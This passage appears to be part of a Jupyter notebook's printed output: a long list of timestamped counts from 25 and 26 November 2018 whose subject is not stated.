"['2018-11-25 12:11:42', '8']\n",
"['2018-11-25 12:12:16', '8']\n",
"['2018-11-25 12:15:18', '0']\n",
"['2018-11-25 12:16:24', '0']\n",
"['2018-11-25 12:33:25', '1']\n",
"['2018-11-25 12:33:57', '4']\n",
"['2018-11-25 12:37:41', '4']\n",
"['2018-11-25 12:38:24', '4']\n",
"['2018-11-25 12:39:20', '4']\n",
"['2018-11-25 12:40:06', '4']\n",
"['2018-11-25 12:41:37', '4']\n",
"['2018-11-25 12:41:50', '6']\n",
"['2018-11-25 12:43:15', '6']\n",
"['2018-11-25 12:44:07', '7']\n",
"['2018-11-25 12:44:38', '8']\n",
"['2018-11-25 12:45:28', '9']\n",
"['2018-11-25 12:46:36', '10']\n",
"['2018-11-25 12:47:41', '8']\n",
"['2018-11-25 12:48:52', '8']\n",
"['2018-11-25 12:50:02', '8']\n",
"['2018-11-25 12:50:13', '9']\n",
"['2018-11-25 12:52:53', '9']\n",
"['2018-11-25 12:54:15', '14']\n",
"['2018-11-25 12:55:05', '10']\n",
"['2018-11-25 12:56:19', '10']\n",
"['2018-11-25 12:56:36', '9']\n",
"['2018-11-25 12:58:54', '9']\n",
"['2018-11-25 12:59:07', '8']\n",
"['2018-11-25 13:01:52', '11']\n",
"['2018-11-25 13:04:49', '11']\n",
"['2018-11-25 13:05:46', '10']\n",
"['2018-11-25 13:06:48', '5']\n",
"['2018-11-25 13:08:06', '5']\n",
"['2018-11-25 13:08:29', '5']\n",
"['2018-11-25 13:09:06', '5']\n",
"['2018-11-25 13:09:23', '5']\n",
"['2018-11-25 13:10:55', '5']\n",
"['2018-11-25 13:11:41', '5']\n",
"['2018-11-25 13:12:23', '4']\n",
"['2018-11-25 13:13:04', '4']\n",
"['2018-11-25 13:13:39', '4']\n",
"['2018-11-25 13:14:45', '4']\n",
"['2018-11-25 13:15:29', '4']\n",
"['2018-11-25 13:15:42', '3']\n",
"['2018-11-25 13:16:37', '3']\n",
"['2018-11-25 13:21:34', '3']\n",
"['2018-11-25 13:26:32', '0']\n",
"['2018-11-25 13:31:30', '0']\n",
"['2018-11-25 13:32:14', '0']\n",
"['2018-11-25 13:32:41', '0']\n",
"['2018-11-25 13:32:55', '0']\n",
"['2018-11-25 13:33:29', '0']\n",
"['2018-11-25 13:34:09', '4']\n",
"['2018-11-25 13:35:04', '6']\n",
"['2018-11-25 13:35:37', '6']\n",
"['2018-11-25 13:37:03', '6']\n",
"['2018-11-25 13:39:06', '6']\n",
"['2018-11-25 13:39:53', '6']\n",
"['2018-11-25 13:40:40', '10']\n",
"['2018-11-25 13:41:44', '10']\n",
"['2018-11-25 13:42:00', '10']\n",
"['2018-11-25 13:43:03', '10']\n",
"['2018-11-25 13:43:52', '9']\n",
"['2018-11-25 13:49:55', '10']\n",
"['2018-11-25 13:51:35', '11']\n",
"['2018-11-25 13:52:14', '12']\n",
"['2018-11-25 13:53:17', '13']\n",
"['2018-11-25 13:54:04', '13']\n",
"['2018-11-25 13:55:19', '15']\n",
"['2018-11-25 13:57:10', '15']\n",
"['2018-11-25 13:58:05', '14']\n",
"['2018-11-25 13:59:29', '13']\n",
"['2018-11-25 14:00:15', '14']\n",
"['2018-11-25 14:01:15', '13']\n",
"['2018-11-25 14:01:50', '12']\n",
"['2018-11-25 14:04:27', '11']\n",
"['2018-11-25 14:04:44', '11']\n",
"['2018-11-25 14:05:48', '11']\n",
"['2018-11-25 14:06:02', '11']\n",
"['2018-11-25 14:07:04', '10']\n",
"['2018-11-25 14:08:02', '10']\n",
"['2018-11-25 14:09:21', '9']\n",
"['2018-11-25 14:10:21', '9']\n",
"['2018-11-25 14:11:14', '9']\n",
"['2018-11-25 14:11:49', '9']\n",
"['2018-11-25 14:14:52', '3']\n",
"['2018-11-25 14:15:59', '0']\n",
"['2018-11-25 14:30:58', '3']\n",
"['2018-11-25 14:31:44', '8']\n",
"['2018-11-25 14:35:32', '10']\n",
"['2018-11-25 14:36:15', '10']\n",
"['2018-11-25 14:37:39', '10']\n",
"['2018-11-25 14:38:15', '15']\n",
"['2018-11-25 14:40:10', '17']\n",
"['2018-11-25 14:40:22', '19']\n",
"['2018-11-25 14:41:50', '20']\n",
"['2018-11-25 14:42:40', '20']\n",
"['2018-11-25 14:43:37', '23']\n",
"['2018-11-25 14:44:24', '23']\n",
"['2018-11-25 14:45:47', '23']\n",
"['2018-11-25 14:46:52', '22']\n",
"['2018-11-25 14:48:00', '22']\n",
"['2018-11-25 14:49:00', '22']\n",
"['2018-11-25 14:49:16', '22']\n",
"['2018-11-25 14:49:42', '21']\n",
"['2018-11-25 14:50:36', '20']\n",
"['2018-11-25 14:51:27', '19']\n",
"['2018-11-25 14:53:32', '10']\n",
"['2018-11-25 14:55:05', '13']\n",
"['2018-11-25 14:57:18', '12']\n",
"['2018-11-25 14:58:00', '11']\n",
"['2018-11-25 15:01:42', '18']\n",
"['2018-11-25 15:03:58', '19']\n",
"['2018-11-25 15:05:26', '11']\n",
"['2018-11-25 15:06:16', '9']\n",
"['2018-11-25 15:07:23', '5']\n",
"['2018-11-25 15:08:58', '3']\n",
"['2018-11-25 15:09:57', '2']\n",
"['2018-11-25 15:10:42', '2']\n",
"['2018-11-25 15:12:00', '2']\n",
"['2018-11-25 15:12:47', '2']\n",
"['2018-11-25 15:13:36', '2']\n",
"['2018-11-25 15:13:46', '2']\n",
"['2018-11-25 15:14:51', '2']\n",
"['2018-11-25 15:15:49', '2']\n",
"['2018-11-25 15:16:23', '2']\n",
"['2018-11-25 15:16:44', '0']\n",
"['2018-11-25 15:17:49', '0']\n",
"['2018-11-25 15:21:12', '0']\n",
"['2018-11-25 15:24:36', '0']\n",
"['2018-11-25 15:28:00', '0']\n",
"['2018-11-25 15:28:38', '1']\n",
"['2018-11-25 15:29:42', '1']\n",
"['2018-11-25 15:29:52', '3']\n",
"['2018-11-25 15:30:53', '3']\n",
"['2018-11-25 15:31:41', '4']\n",
"['2018-11-25 15:32:16', '5']\n",
"['2018-11-25 15:33:16', '5']\n",
"['2018-11-25 15:33:58', '5']\n",
"['2018-11-25 15:36:17', '6']\n",
"['2018-11-25 15:36:35', '8']\n",
"['2018-11-25 15:37:29', '8']\n",
"['2018-11-25 15:38:42', '8']\n",
"['2018-11-25 15:39:01', '17']\n",
"['2018-11-25 15:40:49', '20']\n",
"['2018-11-25 15:42:00', '14']\n",
"['2018-11-25 15:45:44', '10']\n",
"['2018-11-25 15:48:56', '10']\n",
"['2018-11-25 15:50:51', '11']\n",
"['2018-11-25 15:52:23', '11']\n",
"['2018-11-25 15:52:40', '15']\n",
"['2018-11-25 15:53:55', '16']\n",
"['2018-11-25 15:55:46', '16']\n",
"['2018-11-25 15:56:27', '16']\n",
"['2018-11-25 15:57:10', '15']\n",
"['2018-11-25 15:57:35', '15']\n",
"['2018-11-25 15:58:35', '15']\n",
"['2018-11-25 15:59:11', '15']\n",
"['2018-11-25 16:01:45', '6']\n",
"['2018-11-25 16:02:47', '6']\n",
"['2018-11-25 16:03:20', '6']\n",
"['2018-11-25 16:03:40', '6']\n",
"['2018-11-25 16:04:32', '6']\n",
"['2018-11-25 16:04:52', '6']\n",
"['2018-11-25 16:06:09', '4']\n",
"['2018-11-25 16:07:12', '4']\n",
"['2018-11-25 16:08:04', '4']\n",
"['2018-11-25 16:08:39', '4']\n",
"['2018-11-25 16:11:44', '2']\n",
"['2018-11-25 16:12:56', '0']\n",
"['2018-11-25 16:26:41', '3']\n",
"['2018-11-25 16:27:24', '3']\n",
"['2018-11-25 16:31:26', '5']\n",
"['2018-11-25 16:32:11', '5']\n",
"['2018-11-25 16:33:03', '5']\n",
"['2018-11-25 16:33:46', '5']\n",
"['2018-11-25 16:35:15', '5']\n",
"['2018-11-25 16:36:08', '7']\n",
"['2018-11-25 16:37:51', '5']\n",
"['2018-11-25 16:38:37', '7']\n",
"['2018-11-25 16:39:44', '8']\n",
"['2018-11-25 16:40:33', '9']\n",
"['2018-11-25 16:42:08', '10']\n",
"['2018-11-25 16:42:52', '11']\n",
"['2018-11-25 16:44:07', '11']\n",
"['2018-11-25 16:45:16', '11']\n",
"['2018-11-25 16:45:34', '11']\n",
"['2018-11-25 16:46:40', '11']\n",
"['2018-11-25 16:47:07', '7']\n",
"['2018-11-25 16:48:12', '7']\n",
"['2018-11-25 16:51:01', '17']\n",
"['2018-11-25 16:52:24', '17']\n",
"['2018-11-25 16:54:32', '17']\n",
"['2018-11-25 16:55:57', '17']\n",
"['2018-11-25 16:57:29', '8']\n",
"['2018-11-25 17:00:10', '7']\n",
"['2018-11-25 17:01:12', '6']\n",
"['2018-11-25 17:02:21', '5']\n",
"['2018-11-25 17:03:29', '5']\n",
"['2018-11-25 17:03:51', '4']\n",
"['2018-11-25 17:04:31', '4']\n",
"['2018-11-25 17:04:47', '4']\n",
"['2018-11-25 17:06:30', '5']\n",
"['2018-11-25 17:07:18', '3']\n",
"['2018-11-25 17:08:28', '3']\n",
"['2018-11-25 17:09:11', '2']\n",
"['2018-11-25 17:09:53', '2']\n",
"['2018-11-25 17:10:52', '1']\n",
"['2018-11-25 17:11:30', '1']\n",
"['2018-11-25 17:11:48', '1']\n",
"['2018-11-25 17:12:50', '1']\n",
"['2018-11-25 17:18:13', '1']\n",
"['2018-11-25 17:23:36', '0']\n",
"['2018-11-25 17:29:00', '0']\n",
"['2018-11-25 17:29:55', '0']\n",
"['2018-11-25 17:30:27', '0']\n",
"['2018-11-25 17:30:41', '1']\n",
"['2018-11-25 17:31:09', '6']\n",
"['2018-11-25 17:32:27', '7']\n",
"['2018-11-25 17:33:07', '7']\n",
"['2018-11-25 17:34:09', '7']\n",
"['2018-11-25 17:36:42', '7']\n",
"['2018-11-25 17:38:43', '7']\n",
"['2018-11-25 17:39:07', '8']\n",
"['2018-11-25 17:39:56', '9']\n",
"['2018-11-25 17:40:55', '10']\n",
"['2018-11-25 17:41:04', '11']\n",
"['2018-11-25 17:43:16', '12']\n",
"['2018-11-25 17:44:40', '12']\n",
"['2018-11-25 17:47:08', '14']\n",
"['2018-11-25 17:49:27', '15']\n",
"['2018-11-25 17:52:05', '15']\n",
"['2018-11-25 17:52:35', '13']\n",
"['2018-11-25 17:53:23', '9']\n",
"['2018-11-25 17:54:29', '9']\n",
"['2018-11-25 17:55:57', '10']\n",
"['2018-11-25 17:58:15', '11']\n",
"['2018-11-25 17:59:00', '12']\n",
"['2018-11-25 17:59:27', '11']\n",
"['2018-11-25 18:00:27', '10']\n",
"['2018-11-25 18:01:26', '9']\n",
"['2018-11-25 18:04:01', '8']\n",
"['2018-11-25 18:04:22', '8']\n",
"['2018-11-25 18:05:25', '7']\n",
"['2018-11-25 18:06:10', '7']\n",
"['2018-11-25 18:07:34', '6']\n",
"['2018-11-25 18:07:57', '6']\n",
"['2018-11-25 18:09:19', '4']\n",
"['2018-11-25 18:10:25', '4']\n",
"['2018-11-25 18:11:25', '4']\n",
"['2018-11-25 18:12:07', '4']\n",
"['2018-11-25 18:15:57', '4']\n",
"['2018-11-25 18:17:09', '0']\n",
"['2018-11-25 18:25:53', '4']\n",
"['2018-11-25 18:26:58', '6']\n",
"['2018-11-25 18:31:13', '6']\n",
"['2018-11-25 18:32:30', '7']\n",
"['2018-11-25 18:33:52', '7']\n",
"['2018-11-25 18:34:41', '7']\n",
"['2018-11-25 18:36:16', '7']\n",
"['2018-11-25 18:36:28', '8']\n",
"['2018-11-25 18:38:06', '8']\n",
"['2018-11-25 18:38:56', '9']\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-25 18:40:15', '11']\n",
"['2018-11-25 18:41:17', '13']\n",
"['2018-11-25 18:42:12', '14']\n",
"['2018-11-25 18:43:27', '14']\n",
"['2018-11-25 18:44:19', '14']\n",
"['2018-11-25 18:45:34', '15']\n",
"['2018-11-25 18:45:49', '16']\n",
"['2018-11-25 18:46:53', '17']\n",
"['2018-11-25 18:48:31', '17']\n",
"['2018-11-25 18:50:09', '19']\n",
"['2018-11-25 18:51:39', '27']\n",
"['2018-11-25 18:53:03', '28']\n",
"['2018-11-25 18:55:33', '27']\n",
"['2018-11-25 18:56:20', '28']\n",
"['2018-11-25 18:59:55', '16']\n",
"['2018-11-25 19:02:37', '21']\n",
"['2018-11-25 19:03:47', '19']\n",
"['2018-11-25 19:05:12', '13']\n",
"['2018-11-25 19:06:21', '12']\n",
"['2018-11-25 19:07:05', '12']\n",
"['2018-11-25 19:08:09', '10']\n",
"['2018-11-25 19:08:30', '10']\n",
"['2018-11-25 19:09:59', '10']\n",
"['2018-11-25 19:10:53', '10']\n",
"['2018-11-25 19:11:42', '6']\n",
"['2018-11-25 19:12:28', '5']\n",
"['2018-11-25 19:13:39', '5']\n",
"['2018-11-25 19:14:35', '5']\n",
"['2018-11-25 19:15:16', '2']\n",
"['2018-11-25 19:16:17', '2']\n",
"['2018-11-25 19:17:20', '5']\n",
"['2018-11-25 19:20:53', '3']\n",
"['2018-11-25 19:24:26', '0']\n",
"['2018-11-25 19:27:59', '3']\n",
"['2018-11-25 19:28:49', '3']\n",
"['2018-11-25 19:29:13', '3']\n",
"['2018-11-25 19:30:00', '0']\n",
"['2018-11-25 19:30:39', '0']\n",
"['2018-11-25 19:31:39', '0']\n",
"['2018-11-25 19:31:45', '1']\n",
"['2018-11-25 19:33:10', '1']\n",
"['2018-11-25 19:33:57', '1']\n",
"['2018-11-25 19:35:56', '1']\n",
"['2018-11-25 19:36:13', '1']\n",
"['2018-11-25 19:37:12', '1']\n",
"['2018-11-25 19:37:45', '1']\n",
"['2018-11-25 19:38:03', '1']\n",
"['2018-11-25 19:39:44', '1']\n",
"['2018-11-25 19:40:55', '1']\n",
"['2018-11-25 19:44:42', '6']\n",
"['2018-11-25 19:47:16', '6']\n",
"['2018-11-25 19:48:55', '6']\n",
"['2018-11-25 19:51:43', '6']\n",
"['2018-11-25 19:52:00', '7']\n",
"['2018-11-25 19:53:21', '8']\n",
"['2018-11-25 19:54:27', '7']\n",
"['2018-11-25 19:55:50', '7']\n",
"['2018-11-25 19:56:34', '7']\n",
"['2018-11-25 19:57:00', '7']\n",
"['2018-11-25 19:57:39', '7']\n",
"['2018-11-25 19:58:21', '6']\n",
"['2018-11-25 20:00:12', '7']\n",
"['2018-11-25 20:01:21', '7']\n",
"['2018-11-25 20:01:53', '6']\n",
"['2018-11-25 20:02:07', '6']\n",
"['2018-11-25 20:03:16', '5']\n",
"['2018-11-25 20:04:08', '5']\n",
"['2018-11-25 20:05:41', '4']\n",
"['2018-11-25 20:06:55', '4']\n",
"['2018-11-25 20:07:57', '4']\n",
"['2018-11-25 20:08:40', '4']\n",
"['2018-11-25 20:11:43', '1']\n",
"['2018-11-25 20:13:01', '0']\n",
"['2018-11-25 20:26:51', '1']\n",
"['2018-11-25 20:27:47', '6']\n",
"['2018-11-25 20:32:03', '6']\n",
"['2018-11-25 20:32:54', '6']\n",
"['2018-11-25 20:33:54', '6']\n",
"['2018-11-25 20:34:55', '6']\n",
"['2018-11-25 20:36:33', '6']\n",
"['2018-11-25 20:38:22', '6']\n",
"['2018-11-25 20:39:47', '6']\n",
"['2018-11-25 20:40:23', '6']\n",
"['2018-11-25 20:41:11', '6']\n",
"['2018-11-25 20:41:38', '8']\n",
"['2018-11-25 20:43:11', '8']\n",
"['2018-11-25 20:44:16', '7']\n",
"['2018-11-25 20:45:35', '7']\n",
"['2018-11-25 20:46:33', '8']\n",
"['2018-11-25 20:47:20', '8']\n",
"['2018-11-25 20:48:47', '8']\n",
"['2018-11-25 20:49:58', '8']\n",
"['2018-11-25 20:50:15', '9']\n",
"['2018-11-25 20:52:17', '8']\n",
"['2018-11-25 20:53:19', '10']\n",
"['2018-11-25 20:56:30', '12']\n",
"['2018-11-25 20:57:20', '11']\n",
"['2018-11-25 21:01:08', '19']\n",
"['2018-11-25 21:04:26', '19']\n",
"['2018-11-25 21:05:13', '19']\n",
"['2018-11-25 21:05:58', '21']\n",
"['2018-11-25 21:07:04', '21']\n",
"['2018-11-25 21:07:52', '21']\n",
"['2018-11-25 21:08:58', '11']\n",
"['2018-11-25 21:09:49', '11']\n",
"['2018-11-25 21:11:40', '11']\n",
"['2018-11-25 21:12:26', '11']\n",
"['2018-11-25 21:13:08', '8']\n",
"['2018-11-25 21:13:49', '7']\n",
"['2018-11-25 21:14:48', '6']\n",
"['2018-11-25 21:16:00', '4']\n",
"['2018-11-25 21:16:38', '2']\n",
"['2018-11-25 21:17:40', '1']\n",
"['2018-11-25 21:18:45', '1']\n",
"['2018-11-25 21:22:47', '1']\n",
"['2018-11-25 21:26:49', '0']\n",
"['2018-11-25 21:30:52', '2']\n",
"['2018-11-25 21:31:42', '2']\n",
"['2018-11-25 21:32:05', '0']\n",
"['2018-11-25 21:32:53', '0']\n",
"['2018-11-25 21:33:28', '0']\n",
"['2018-11-25 21:34:25', '1']\n",
"['2018-11-25 21:35:08', '1']\n",
"['2018-11-25 21:35:41', '1']\n",
"['2018-11-25 21:36:21', '1']\n",
"['2018-11-25 21:38:04', '1']\n",
"['2018-11-25 21:38:21', '1']\n",
"['2018-11-25 21:39:32', '1']\n",
"['2018-11-25 21:40:06', '1']\n",
"['2018-11-25 21:40:23', '1']\n",
"['2018-11-25 21:42:08', '1']\n",
"['2018-11-25 21:43:01', '1']\n",
"['2018-11-25 21:45:21', '10']\n",
"['2018-11-25 21:47:45', '10']\n",
"['2018-11-25 21:48:15', '10']\n",
"['2018-11-25 21:49:27', '11']\n",
"['2018-11-25 21:50:47', '14']\n",
"['2018-11-25 21:52:16', '18']\n",
"['2018-11-25 21:54:02', '18']\n",
"['2018-11-25 21:55:23', '18']\n",
"['2018-11-25 21:56:23', '17']\n",
"['2018-11-25 21:57:12', '16']\n",
"['2018-11-25 21:58:12', '16']\n",
"['2018-11-25 21:58:45', '15']\n",
"['2018-11-25 22:00:30', '6']\n",
"['2018-11-25 22:01:19', '5']\n",
"['2018-11-25 22:02:31', '5']\n",
"['2018-11-25 22:02:47', '4']\n",
"['2018-11-25 22:04:19', '2']\n",
"['2018-11-25 22:04:34', '2']\n",
"['2018-11-25 22:06:35', '2']\n",
"['2018-11-25 22:07:16', '2']\n",
"['2018-11-25 22:08:12', '2']\n",
"['2018-11-25 22:08:50', '2']\n",
"['2018-11-25 22:12:00', '2']\n",
"['2018-11-25 22:13:05', '0']\n",
"['2018-11-25 22:31:21', '3']\n",
"['2018-11-25 22:31:55', '8']\n",
"['2018-11-25 22:35:50', '8']\n",
"['2018-11-25 22:36:29', '8']\n",
"['2018-11-25 22:37:19', '8']\n",
"['2018-11-25 22:38:18', '8']\n",
"['2018-11-25 22:39:44', '8']\n",
"['2018-11-25 22:40:15', '8']\n",
"['2018-11-25 22:41:19', '8']\n",
"['2018-11-25 22:41:44', '8']\n",
"['2018-11-25 22:42:21', '8']\n",
"['2018-11-25 22:42:55', '8']\n",
"['2018-11-25 22:44:21', '8']\n",
"['2018-11-25 22:45:05', '7']\n",
"['2018-11-25 22:45:57', '6']\n",
"['2018-11-25 22:47:55', '6']\n",
"['2018-11-25 22:48:12', '6']\n",
"['2018-11-25 22:48:51', '6']\n",
"['2018-11-25 22:50:17', '10']\n",
"['2018-11-25 22:51:28', '10']\n",
"['2018-11-25 22:52:14', '10']\n",
"['2018-11-25 22:53:50', '9']\n",
"['2018-11-25 22:55:16', '8']\n",
"['2018-11-25 22:55:53', '8']\n",
"['2018-11-25 22:57:03', '0']\n",
"['2018-11-26 06:50:17', '2']\n",
"['2018-11-26 06:50:59', '3']\n",
"['2018-11-26 06:51:50', '4']\n",
"['2018-11-26 06:52:29', '5']\n",
"['2018-11-26 06:53:28', '5']\n",
"['2018-11-26 06:54:15', '6']\n",
"['2018-11-26 06:54:58', '6']\n",
"['2018-11-26 06:55:23', '7']\n",
"['2018-11-26 06:56:27', '7']\n",
"['2018-11-26 06:58:04', '7']\n",
"['2018-11-26 06:58:17', '7']\n",
"['2018-11-26 06:58:46', '8']\n",
"['2018-11-26 06:59:40', '8']\n",
"['2018-11-26 06:59:48', '9']\n",
"['2018-11-26 07:01:03', '9']\n",
"['2018-11-26 07:01:41', '9']\n",
"['2018-11-26 07:02:46', '12']\n",
"['2018-11-26 07:05:26', '12']\n",
"['2018-11-26 07:06:14', '13']\n",
"['2018-11-26 07:07:09', '17']\n",
"['2018-11-26 07:07:55', '16']\n",
"['2018-11-26 07:09:00', '16']\n",
"['2018-11-26 07:09:28', '16']\n",
"['2018-11-26 07:09:59', '18']\n",
"['2018-11-26 07:11:02', '19']\n",
"['2018-11-26 07:12:05', '19']\n",
"['2018-11-26 07:12:38', '19']\n",
"['2018-11-26 07:13:18', '22']\n",
"['2018-11-26 07:16:02', '22']\n",
"['2018-11-26 07:16:35', '22']\n",
"['2018-11-26 07:17:08', '22']\n",
"['2018-11-26 07:17:28', '22']\n",
"['2018-11-26 07:18:26', '22']\n",
"['2018-11-26 07:18:48', '22']\n",
"['2018-11-26 07:20:22', '22']\n",
"['2018-11-26 07:21:06', '22']\n",
"['2018-11-26 07:22:14', '22']\n",
"['2018-11-26 07:22:52', '22']\n",
"['2018-11-26 07:26:24', '13']\n",
"['2018-11-26 07:27:45', '0']\n",
"['2018-11-26 07:49:44', '5']\n",
"['2018-11-26 07:50:29', '8']\n",
"['2018-11-26 07:54:39', '8']\n",
"['2018-11-26 07:55:26', '8']\n",
"['2018-11-26 07:56:24', '8']\n",
"['2018-11-26 07:57:13', '8']\n",
"['2018-11-26 07:58:47', '8']\n",
"['2018-11-26 07:59:08', '10']\n",
"['2018-11-26 08:00:53', '13']\n",
"['2018-11-26 08:01:44', '14']\n",
"['2018-11-26 08:02:46', '15']\n",
"['2018-11-26 08:03:39', '18']\n",
"['2018-11-26 08:04:48', '19']\n",
"['2018-11-26 08:06:20', '19']\n",
"['2018-11-26 08:06:53', '17']\n",
"['2018-11-26 08:08:42', '20']\n",
"['2018-11-26 08:09:49', '20']\n",
"['2018-11-26 08:10:26', '19']\n",
"['2018-11-26 08:11:36', '20']\n",
"['2018-11-26 08:12:54', '18']\n",
"['2018-11-26 08:14:42', '16']\n",
"['2018-11-26 08:15:33', '15']\n",
"['2018-11-26 08:17:01', '14']\n",
"['2018-11-26 08:18:49', '14']\n",
"['2018-11-26 08:20:00', '17']\n",
"['2018-11-26 08:22:59', '18']\n",
"['2018-11-26 08:24:30', '18']\n",
"['2018-11-26 08:25:06', '19']\n",
"['2018-11-26 08:26:11', '19']\n",
"['2018-11-26 08:26:57', '19']\n",
"['2018-11-26 08:27:36', '19']\n",
"['2018-11-26 08:27:51', '17']\n",
"['2018-11-26 08:29:43', '17']\n",
"['2018-11-26 08:30:28', '15']\n",
"['2018-11-26 08:31:35', '10']\n",
"['2018-11-26 08:32:15', '13']\n",
"['2018-11-26 08:33:30', '13']\n",
"['2018-11-26 08:34:20', '8']\n",
"['2018-11-26 08:35:02', '7']\n",
"['2018-11-26 08:36:04', '2']\n",
"['2018-11-26 08:37:20', '2']\n",
"['2018-11-26 08:43:28', '2']\n",
"['2018-11-26 08:49:36', '0']\n",
"['2018-11-26 08:55:45', '8']\n",
"['2018-11-26 08:56:23', '10']\n",
"['2018-11-26 08:57:20', '12']\n",
"['2018-11-26 08:58:04', '15']\n",
"['2018-11-26 08:58:56', '16']\n",
"['2018-11-26 09:00:30', '19']\n",
"['2018-11-26 09:01:09', '20']\n",
"['2018-11-26 09:02:14', '24']\n",
"['2018-11-26 09:03:24', '24']\n",
"['2018-11-26 09:04:59', '27']\n",
"['2018-11-26 09:05:47', '27']\n",
"['2018-11-26 09:06:28', '34']\n",
"['2018-11-26 09:07:52', '36']\n",
"['2018-11-26 09:08:35', '36']\n",
"['2018-11-26 09:10:46', '36']\n",
"['2018-11-26 09:11:28', '35']\n",
"['2018-11-26 09:15:32', '69']\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-26 09:18:39', '70']\n",
"['2018-11-26 09:20:19', '65']\n",
"['2018-11-26 09:22:02', '53']\n",
"['2018-11-26 09:23:51', '46']\n",
"['2018-11-26 09:25:30', '39']\n",
"['2018-11-26 09:26:51', '34']\n",
"['2018-11-26 09:27:56', '24']\n",
"['2018-11-26 09:29:32', '22']\n",
"['2018-11-26 09:30:26', '21']\n",
"['2018-11-26 09:31:51', '20']\n",
"['2018-11-26 09:33:04', '19']\n",
"['2018-11-26 09:36:35', '20']\n",
"['2018-11-26 09:37:48', '20']\n",
"['2018-11-26 09:38:39', '20']\n",
"['2018-11-26 09:38:52', '18']\n",
"['2018-11-26 09:40:02', '15']\n",
"['2018-11-26 09:41:04', '15']\n",
"['2018-11-26 09:42:10', '13']\n",
"['2018-11-26 09:43:11', '13']\n",
"['2018-11-26 09:44:22', '13']\n",
"['2018-11-26 09:44:50', '11']\n",
"['2018-11-26 09:46:47', '11']\n",
"['2018-11-26 09:47:35', '11']\n",
"['2018-11-26 09:47:57', '11']\n",
"['2018-11-26 09:48:29', '10']\n",
"['2018-11-26 09:53:04', '1']\n",
"['2018-11-26 09:54:16', '0']\n",
"['2018-11-26 09:55:42', '5']\n",
"['2018-11-26 09:57:09', '10']\n",
"['2018-11-26 09:58:36', '10']\n",
"['2018-11-26 10:00:03', '10']\n",
"['2018-11-26 10:01:30', '10']\n",
"['2018-11-26 10:02:57', '9']\n",
"['2018-11-26 10:04:24', '9']\n",
"['2018-11-26 10:05:51', '10']\n",
"['2018-11-26 10:07:18', '15']\n",
"['2018-11-26 10:08:45', '15']\n",
"['2018-11-26 10:10:12', '15']\n",
"['2018-11-26 10:11:38', '15']\n",
"['2018-11-26 10:13:05', '16']\n",
"['2018-11-26 10:14:32', '16']\n",
"['2018-11-26 10:15:59', '17']\n",
"['2018-11-26 10:17:26', '15']\n",
"['2018-11-26 10:18:53', '17']\n",
"['2018-11-26 10:20:20', '23']\n",
"['2018-11-26 10:21:47', '22']\n",
"['2018-11-26 10:23:14', '17']\n",
"['2018-11-26 10:24:41', '18']\n",
"['2018-11-26 10:26:08', '18']\n",
"['2018-11-26 10:27:34', '16']\n",
"['2018-11-26 10:29:01', '15']\n",
"['2018-11-26 10:30:28', '16']\n",
"['2018-11-26 10:31:55', '17']\n",
"['2018-11-26 10:33:22', '16']\n",
"['2018-11-26 10:34:49', '16']\n",
"['2018-11-26 10:36:16', '14']\n",
"['2018-11-26 10:37:43', '12']\n",
"['2018-11-26 10:39:10', '9']\n",
"['2018-11-26 10:40:37', '9']\n",
"['2018-11-26 10:42:04', '9']\n",
"['2018-11-26 10:43:30', '7']\n",
"['2018-11-26 10:44:57', '4']\n",
"['2018-11-26 10:46:24', '3']\n",
"['2018-11-26 10:47:51', '3']\n",
"['2018-11-26 10:49:18', '1']\n",
"['2018-11-26 10:50:45', '0']\n",
"['2018-11-26 10:52:12', '0']\n",
"['2018-11-26 10:53:39', '0']\n",
"['2018-11-26 10:55:06', '0']\n",
"['2018-11-26 10:56:33', '0']\n",
"['2018-11-26 10:58:00', '3']\n",
"['2018-11-26 10:58:35', '4']\n",
"['2018-11-26 10:59:31', '4']\n",
"['2018-11-26 10:59:42', '7']\n",
"['2018-11-26 11:00:42', '7']\n",
"['2018-11-26 11:02:02', '9']\n",
"['2018-11-26 11:02:07', '10']\n",
"['2018-11-26 11:03:00', '12']\n",
"['2018-11-26 11:04:10', '12']\n",
"['2018-11-26 11:05:42', '13']\n",
"['2018-11-26 11:06:25', '13']\n",
"['2018-11-26 11:07:10', '13']\n",
"['2018-11-26 11:07:30', '15']\n",
"['2018-11-26 11:08:15', '15']\n",
"['2018-11-26 11:10:13', '18']\n",
"['2018-11-26 11:11:34', '17']\n",
"['2018-11-26 11:15:02', '36']\n",
"['2018-11-26 11:17:40', '37']\n",
"['2018-11-26 11:19:24', '38']\n",
"['2018-11-26 11:21:00', '39']\n",
"['2018-11-26 11:23:03', '38']\n",
"['2018-11-26 11:24:31', '36']\n",
"['2018-11-26 11:25:36', '33']\n",
"['2018-11-26 11:27:28', '28']\n",
"['2018-11-26 11:28:51', '26']\n",
"['2018-11-26 11:29:59', '27']\n",
"['2018-11-26 11:31:39', '30']\n",
"['2018-11-26 11:32:39', '29']\n",
"['2018-11-26 11:34:37', '30']\n",
"['2018-11-26 11:35:27', '29']\n",
"['2018-11-26 11:36:33', '29']\n",
"['2018-11-26 11:36:48', '29']\n",
"['2018-11-26 11:37:59', '28']\n",
"['2018-11-26 11:39:04', '28']\n",
"['2018-11-26 11:40:20', '27']\n",
"['2018-11-26 11:41:20', '26']\n",
"['2018-11-26 11:42:40', '26']\n",
"['2018-11-26 11:43:10', '26']\n",
"['2018-11-26 11:45:08', '25']\n",
"['2018-11-26 11:46:24', '25']\n",
"['2018-11-26 11:46:43', '23']\n",
"['2018-11-26 11:47:45', '23']\n",
"['2018-11-26 11:52:57', '5']\n",
"['2018-11-26 11:54:10', '0']\n",
"['2018-11-26 11:55:37', '10']\n",
"['2018-11-26 11:57:05', '18']\n",
"['2018-11-26 11:58:33', '17']\n",
"['2018-11-26 12:00:01', '17']\n",
"['2018-11-26 12:01:28', '17']\n",
"['2018-11-26 12:02:56', '18']\n",
"['2018-11-26 12:04:24', '18']\n",
"['2018-11-26 12:05:52', '18']\n",
"['2018-11-26 12:07:20', '18']\n",
"['2018-11-26 12:08:47', '17']\n",
"['2018-11-26 12:10:15', '17']\n",
"['2018-11-26 12:11:43', '19']\n",
"['2018-11-26 12:13:11', '17']\n",
"['2018-11-26 12:14:39', '18']\n",
"['2018-11-26 12:16:06', '18']\n",
"['2018-11-26 12:17:34', '16']\n",
"['2018-11-26 12:19:02', '17']\n",
"['2018-11-26 12:20:30', '19']\n",
"['2018-11-26 12:21:58', '18']\n",
"['2018-11-26 12:23:25', '17']\n",
"['2018-11-26 12:24:53', '24']\n",
